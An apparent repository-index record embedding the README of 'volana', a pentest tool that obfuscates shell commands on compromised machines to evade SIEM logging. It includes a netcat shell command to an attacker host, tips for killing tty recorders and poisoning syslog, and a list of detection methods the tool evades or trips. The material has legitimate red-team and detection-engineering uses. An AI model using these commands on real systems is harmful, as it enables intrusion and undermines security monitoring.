{"id":13639117,"url":"https://github.com/ariary/volana","last_synced_at":"2025-04-26T19:31:45.452Z","repository":{"id":109493495,"uuid":"445226449","full_name":"ariary/volana","owner":"ariary","description":"🌒 Shell command obfuscation to avoid detection systems","archived":false,"fork":false,"pushed_at":"2022-10-10T19:20:52.000Z","size":89,"stargazers_count":125,"open_issues_count":0,"forks_count":11,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-04-04T17:11:33.523Z","etag":null,"topics":["exploitation","infosec","obfuscator","pentest","pentest-tool","redteam","security","shell-obfuscate"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"unlicense","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ariary.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-01-06T15:55:41.000Z","updated_at":"2025-03-23T08:54:48.000Z","dependencies_parsed_at":"2023-06-09T01:15:14.851Z","dependency_job_id":null,"html_url":"https://github.com/ariary/volana","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ariary%2Fvolana/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ariary","download_url":"https://codeload.github.com/ariary/volana/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251041419,"owners_count":21527189,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploitation","infosec","obfuscator","pentest","pentest-tool","redteam","security","shell-obfuscate"],"created_at":"2024-08-02T01:00:57.843Z","updated_at":"2025-04-26T19:31:45.153Z","avatar_url":"https://github.com/ariary.png","language":"Go","funding_links":[],"categories":["Go"],"sub_categories":[],"readme":"\n\u003cdiv align=\"center\"\u003e\n\u003ch3\u003e\u003ci\u003evolana\u003csub\u003e (moon in malagasy)\u003c/i\u003e\u003c/h3\u003e\n\u003cimg src=\"https://github.com/ariary/volana/blob/main/img/moon.png\"\u003e\n\n\n\u003cp\u003e\u003cstrong\u003e\u003cpre\u003e\u003ccode\u003e{ \u003ca href=\"#usage\"\u003eUse it\u003c/a\u003e ; \u003ca href=\"#hide-from\"\u003e🌚\u003csub\u003e(hide from)\u003c/sub\u003e\u003c/a\u003e; \u003ca href=\"#visible-for\"\u003e🌞\u003csub\u003e(detected by)\u003c/sub\u003e\u003c/a\u003e } \u003c/code\u003e\u003c/pre\u003e\u003c/strong\u003e\u003c/p\u003e\n\u003ch4\u003e Shell command obfuscation to avoid SIEM/detection system \u003c/h4\u003e\n \u003cp\u003e During pentest, an important aspect is to \u003cb\u003ebe stealth\u003c/b\u003e. For this reason you should \u003cb\u003eclear your tracks after your passage\u003c/b\u003e. Nevertheless, many infrastructures log command and send  them to a SIEM in a real time making the afterwards cleaning part alone useless.\u003cbr\u003e\u003cbr\u003e\u003ccode\u003evolana\u003c/code\u003e provide a simple way to hide commands executed on compromised machine by providing it self shell runtime (enter your command, volana executes for you). Like this you \u003cb\u003eclear your tracks DURING your passage\u003c/b\u003e\u003c/p\u003e\n\u003c/div\u003e\n\n## Usage\n\nYou need to get an interactive shell. (Find a way to spawn it, you are a hacker, it's your job ! [otherwise](#from-non-interactive-shell)). Then download it on target machine and launch it. that's it, now you can type the command you want to be stealthy executed \n```shell\n## Download it from github release\n## If you do not have internet access from compromised machine, find another way\ncurl -lO -L https://github.com/ariary/volana/releases/latest/download/volana\n\n## Execute it\n./volana\n\n## You are now under the radar\nvolana » echo \"Hi SIEM team! Do you find me?\" \u003e /dev/null 2\u003e\u00261  #you are allowed to be a bit cocky\nvolana » [command]\n```\n\nKeyword for volana console:\n* `ring`: enable ring mode ie each command is launched with plenty others to cover tracks (from solution that monitor system call)\n* `exit`: exit volana console\n\n### from non interactive shell\n\nImagine you have a non interactive shell (webshell or blind rce), you could use `encrypt` and `decrypt` subcommand.\nPreviously, you need to build `volana` with embedded encryption key.\n\n**On attacker machine**\n```shell\n## Build volana with encryption key\nmake build.volana-with-encryption\n\n## Transfer it on TARGET (the unique detectable command)\n## [...]\n\n## Encrypt the command you want to stealthy execute\n## (Here a nc bindshell to obtain a interactive shell)\nvolana encr \"nc [attacker_ip] [attacker_port] -e /bin/bash\"\n\u003e\u003e\u003e ENCRYPTED COMMAND\n```\n\nCopy encrypted command and executed it with your rce **on target machine**\n```shell\n./volana decr [encrypted_command]\n## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)\n\n```\n\n***Why not just hide command with `echo [command] | base64` ?***\nAnd decode on target with `echo [encoded_command] | base64 -d | bash`\n\nBecause we want to be protected against systems that trigger alert for `base64` use or that seek base64 text in command. Also we want to make investigation difficult and base64 isn't a real brake.\n\n## Detection\n\nKeep in mind that `volana` is not a miracle that will make you totally invisible. Its aim is to make intrusion detection and investigation harder.\n\nBy detected we mean if we are able to trigger an alert if a certain command has been executed.\n\n\n### Hide from\n\nOnly the `volana` launching command line will be catched. 🧠 **However, by adding a space** before executing it, the default bash behavior is to not save it\n\n* Detection systems that are based on history command output\n* Detection systems that are based on history files\n  * `.bash_history`, \".zsh_history\" etc ..\n* Detection systems that are based on bash debug traps\n* Detection systems that are based on sudo built-in logging system\n* Detection systems tracing all processes syscall system-wide (eg `opensnoop`)\n* Terminal (tty) recorder (`script`, `screen -L`, [`sexonthebash`](https://github.com/ariary/sexonthebash), `ovh-ttyrec`, etc..)\n  * Easy to detect \u0026 avoid: `pkill -9 script`\n  * Not a common case\n  * `screen` is a bit more difficult to avoid, however it does not register input (secret input: `stty -echo` =\u003e avoid)\n  * Command detection Could be avoid with `volana` with encryption \n\n### Visible for\n\n* Detection systems that have alert for unknown command (volana one)\n* Detection systems that are based on keylogger\n  * Easy to avoid: copy/past commands\n  * Not a common case\n* Detection systems that are based on syslog files (e.g. `/var/log/auth.log`)\n  * Only for `sudo` or `su` commands\n  * syslog file could be modified and thus be poisoned as you wish (e.g for */var/log/auth.log*:`logger -p auth.info \"No hacker is poisoning your syslog solution, don't worry\"`)\n* Detection systems that are based on syscall (eg auditd,LKML/eBPF)\n  * Difficult to analyze, could be make unreadable by making several diversion syscalls\n* Custom `LD_PRELOAD` injection to make log\n  * Not a common case at all\n\n## Bug bounty\n\nSorry for the clickbait title, but no money will be provided for contibutors. 🐛\n\n Let me know if you have found:\n* a way to detect `volana`\n* a way to spy console that don't detect `volana` commands\n* a way to avoid a detection system\n\n[Report here](https://github.com/ariary/volana/issues/new/choose)\n\n \n## Credit\n* [8 ways to spy on console](https://github.com/annmuor/zn2021_8ways)\n* [moonwalk](https://github.com/mufeedvh/moonwalk): similar tool that clear tracks AFTER passage\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fvolana","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fariary%2Fvolana","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fariary%2Fvolana/lists"}